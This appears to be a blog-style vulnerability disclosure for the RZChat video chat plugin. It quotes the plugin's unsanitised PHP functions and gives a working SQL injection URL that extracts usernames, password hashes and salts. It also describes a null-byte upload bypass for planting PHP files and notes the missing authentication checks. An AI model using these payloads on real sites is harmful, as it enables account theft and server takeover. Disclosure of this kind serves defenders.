Video Chat By rayzzz.com (RZChat) – SQL Injection / Arbitrary File Upload

The video chat plugin by http://rayzzz.com is a Flash-based powerful chat solution for social sites with many features, such as: audio/video broadcastings, private conversations, chat history and others. This plugin is available for many platforms such as vBulletin, Drupal, elgg and plenty of others.

http://www.vbulletin.org/forum/showthread.php?t=311868
http://www.vbulletin.org/forum/showthread.php?t=311867
https://community.elgg.org/plugins/1845064/1.0.1/video-chat
https://www.drupal.org/sandbox/rayzzz.com/2073153

It’s vulnerable to the following:
– SQL Injection
– Arbitrary File Upload
– Bad Authentication

SQL Injection
Pretty much all queries use variables which are not being sanitized.
One of the functions we can easily exploit is the actionSearchUser function which then calls the _searchUser function in /rzchat/rz_integration.php.

	function _searchUser($sValue, $sField = "ID"){
	    if($sField == "ID")
		   $sField = "userid";
		else
		   $sField = "username";
		$sId = $this->oDb->getValue("SELECT `userid` FROM `" . $this->DB_PREFIX . "user` WHERE `" . $sField . "` = '" . $sValue . "' LIMIT 1");
		return $sId;
	}

We can grab any information out of the database by making a GET request to:
http://example.com/rzchat/XML.php?rzaction=SearchUser¶m=ID&value=2' union select concat(username,0x3a,password,0x3a,salt) from user where userid = '1

Which will then display the username, password and salt of userid = 1.

Arbitrary File Upload
The actionUploadFile function in the rz_module.php file does not check on the file extension, but only tries to change it to a .temp file, we can ignore this by adding a null byte.

    function actionUploadFile(){
		$sSender = $this->_getRequestVar("sender");
        if(empty($sSender))
			return;
        if(is_uploaded_file($_FILES['Filedata']['tmp_name'])) {
            $sFilePath = $this->sFilesPath . $sSender . ".temp";
            @unlink($sFilePath);
            move_uploaded_file($_FILES['Filedata']['tmp_name'], $sFilePath);
            @chmod($sFilePath, 0644);
        }
    }

We exploit this by using a form like this:

Simply upload any php file you want and the file will be located at http://example.com/rzchat/files/file.php

Bad Authentication
None of the functions check if the current user is authenticated or authorized to access the function.
You could for example change rooms, delete rooms and ban any user you want.

Images

RZChat SQL Injection

Leave a Reply

Your email address will not be published / Required fields are marked *